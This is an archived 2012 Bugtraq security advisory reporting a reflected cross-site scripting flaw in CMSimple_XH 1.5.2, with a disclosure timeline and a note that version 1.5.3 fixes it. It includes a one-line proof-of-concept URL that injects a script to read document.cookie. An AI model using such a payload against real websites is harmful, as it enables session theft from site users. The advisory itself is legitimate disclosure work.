| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <201203211119.q2LBJ02b026287@sf01web2.securityfocus.com> Date: Wed, 21 Mar 2012 11:19:00 GMT From: sschurtz@...ksecurity.de To: bugtraq@...urityfocus.com Subject: CMSimple_XH 1.5.2 Cross-site Scripting vulnerability Advisory: CMSimple_XH 1.5.2 Cross-site Scripting vulnerability Advisory ID: SSCHADV2012-008 Author: Stefan Schurtz Affected Software: Successfully tested on CMSimple_XH 1.5.2 Vendor URL: http://www.cmsimple-xh.de Vendor Status: fixed ========================== Vulnerability Description ========================== CMSimple_XH 1.5.2 is prone to Cross-site Scripting vulnerability ================== PoC-Exploit ================== http://[target]/cmsimple/cmsimplexh152/?'"</script><script>alert(document.cookie)</script> ========= Solution ========= Update to the latest version ==================== Disclosure Timeline ==================== 15-Mar-2012 - vendor informed 19-Mar-2012 - fixed in version v1.5.3 ======== Credits ======== Vulnerability found and advisory written by Stefan Schurtz. =========== References =========== http://www.cmsimple-xh.de/?History_und_ChangeLog/19.03.2012_-_v1.5.3 http://www.darksecurity.de/advisories/2012/SSCHADV2012-008.txt
Powered by blists - more mailing lists